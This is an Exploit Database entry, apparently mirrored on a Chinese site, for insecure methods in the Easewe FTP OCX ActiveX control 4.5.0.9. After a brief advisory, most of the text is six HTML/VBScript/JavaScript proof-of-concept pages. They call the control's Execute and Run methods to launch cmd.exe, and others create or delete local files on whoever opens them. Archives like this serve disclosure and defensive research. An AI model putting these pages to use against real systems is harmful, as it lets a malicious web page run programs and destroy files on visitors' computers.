Easewe FTP OCX ActiveX Control 4.5.0.9 – ‘EaseWeFtp.ocx’ Multiple Insecure Method Vulnerabilities

• Exploit Database
• 107 阅读

• 作者： High-Tech Bridge SA
  日期： 2011-06-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35876/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102

  source: https://www.securityfocus.com/bid/48393/info   Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.   Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.   Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected.   1. <html> <object classid=&apos;clsid:31AE647D-11D1-4E6A-BE2D-90157640019A&apos; id=&apos;target&apos; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &apos;vbscript&apos;> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Execute arg1 ,arg2 ,arg3 End Sub </script> </html>   2. <html> <object classid=&apos;clsid:31AE647D-11D1-4E6A-BE2D-90157640019A&apos; id=&apos;target&apos; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &apos;vbscript&apos;> Sub Boom() arg1="c:\windows\system32\cmd.exe" arg2="" arg3=1 target.Run arg1 ,arg2 ,arg3 End Sub </script> </html>   3. <html> <object classid=&apos;clsid:31AE647D-11D1-4E6A-BE2D-90157640019A&apos; id=&apos;target&apos; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &apos;vbscript&apos;>   Sub Boom() arg1="FilePath\Filename_to_create" target.CreateLocalFile arg1 End Sub   </script> </html>   4. <html> <object classid=&apos;clsid:31AE647D-11D1-4E6A-BE2D-90157640019A&apos; id=&apos;target&apos; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &apos;vbscript&apos;>   Sub Boom() arg1="Directorypath\Directory" target.CreateLocalFolder arg1 End Sub   </script> </html>   5. <html> <object classid=&apos;clsid:31AE647D-11D1-4E6A-BE2D-90157640019A&apos; id=&apos;target&apos; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &apos;vbscript&apos;>   Sub Boom() arg1="FilePath\Filename_to_delete" target.DeleteLocalFile arg1 End Sub </script> </html>   <HTML> Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br> <br> Description There is Insecure Method in (LocalFileCreate) fonction<br> Found By : coolkaveh<br>   <title>Exploited By : coolkaveh </title> <BODY> <object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>   <SCRIPT>   function Do_it() { File = "kaveh.txt" cyber.LocalFileCreate(File) }   </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> </body> </HTML>